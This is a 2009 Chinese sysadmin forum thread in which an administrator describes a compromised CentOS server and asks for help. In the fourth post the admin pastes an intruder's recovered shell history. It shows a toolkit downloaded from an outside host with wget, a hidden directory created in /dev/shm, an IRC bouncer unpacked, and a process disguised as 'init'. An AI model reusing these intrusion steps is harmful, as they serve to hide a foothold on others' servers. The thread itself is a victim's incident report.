论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2009-02-27 10:32 |只看该作者 |倒序浏览

系统是CentOS5.1

一个root组的用户的~/.bash_history被重定向到了/dev/null，该用户没有sudo权限
不知道还能在什么地方看出操作记录了
曾经在ps中看到过该用户的mldonkey在工作
kill掉了
在apache的log中看到很多ip访问网站下的.tmp/下的一些rmvb
apache下有该用户创建的.tmp目录，但是是空的
到现在仍然有很多用户通过http访问这个目录下的不存在的文件

密码过于简单，是123123，现在改了
查看了root的~/.bash_history没发现有什么问题
查看了/bin/ps
[root@localhost ~]# ls -l /bin/ps
-r-xr-xr-x 1 root root 79068 2008-05-25 /bin/ps

但是现在yum无法使用，执行总返回404

曾经发现cyrus用户登录过，并且执行了很占用资源的find进程，还有其他一些很奇怪的进程名字。也查找不到相应文件。后来该cyrus设置了密码。没见到再上线

root好像也很危险。
[root@localhost ~]# last | grep root
root    pts/1       221.223.79.215 Fri Feb 20 14:16 - 16:30  (02:13)
root    pts/1       172.131.64.71 Thu Feb 12 09:30 - 09:42  (00:11)
root    pts/1       85.112.3.165    Mon Jan 12 23:02 - 23:02  (00:00)
root    pts/1       123.117.226.7 Thu Dec 11 12:40 - 12:42  (00:02)
root    pts/0       221.223.121.123  Fri Nov 28 13:04 - 15:16  (02:11)
。。。。
221.223的应该是我们自己的，中间三行。。。

ps aux的列表贴出来不知道是否安全？

文库|博客

dreamice

版主

论坛徽章:: 3

2楼 [报告]

发表于 2009-02-27 10:34 |只看该作者

回复 #1 艾斯尼勒的帖子

密码还是稍微复杂一点好啊

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

艾斯尼勒

家境小康

论坛徽章:: 0

3楼 [报告]

发表于 2009-02-27 10:38 |只看该作者

没有负责安全的人员，我也不懂安全
所以安全措施都没有作

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

艾斯尼勒

家境小康

论坛徽章:: 0

4楼 [报告]

发表于 2009-02-27 10:41 |只看该作者

啊。在cyrus目录中找到了.bash_history

[root@localhost imap]# cat .bash_history
w
uname -a
passwd
cat /proc/cpuinfo
cat /etc/hosts
ls -a
cd /dev/shm
lls -a
ls -a
mkdir " "
cd " "
wget
wget www.freewebtown.com/spionu/zH.tgz
ls -a
mkdir .m
ls -a
tar xvfz zH.tgz
rm -pfr zH.tgz
rm -fr zH.tgz
cd zH
ls -a
rm -fr vuln.txt
screen
./screen
ls -a
cd ..
ls -a
cd .m
ls -a
tar xvfz muh.tar.gz
ls -a
rm -fr muh.tar.gz m.ses
chmod +x *
PATH="." init
id
cd " "
cd /var/
cd /dev/shm
w
cd " "
ls -a
cd zH
ls -a
cat vuln.txt
screen -r
./screen -r